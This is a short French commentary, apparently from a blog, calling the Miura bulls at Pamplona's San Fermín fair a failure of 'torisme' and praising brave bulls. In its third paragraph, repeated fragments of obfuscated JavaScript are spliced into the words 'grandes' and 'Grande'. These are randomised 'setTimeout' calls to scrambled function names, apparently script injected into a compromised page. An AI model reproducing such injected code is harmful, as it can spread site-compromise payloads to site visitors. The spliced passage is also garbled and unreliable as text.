MIURA : ECHEC DU TORISME A PAMPELUNE

Un bon taureau : le sixième qui, comme il était brave, paraissait commercial. ; un autre, le second, qui chargeait à demi, et de ce fait se distingua injustement du lot ; et quatre moruchos de Miura, sur la même ligne de jeu que les taureaux de Dolores Aguirre et Adolfo Martin, qui bouclèrent la féria de San Fermin. En définitive, un échec sans palliatif du torisme.

Ce qui est mauvais dans le torisme c’est qu’il ennuie, provoque des lidias assommantes, un toréo défensif qui fait bâiller et laisse sans arguments les apôtres les plus récalcitrants du taureau manso avec un génie défensif, dans le meilleur des cas,  ou du taureau manso qui tout simplement s’arrête.

Heureusement, les taureaux commerciaux, avec des encornures et un volume similaires mais avec beaucoup plus de bravoure, sauvèrent la féria, car leur bravoure donna lieu à de grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes performances taurines et à de nombreuses sorties par la Puerta Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande.

Le véritable torisme devrait privilégier les élevages qui chargent, c’est-à-dire les braves, et les taureaux ayant les formes requises. Le reste n’est qu’un conte à dormir debout.

Les commentaires sont fermés.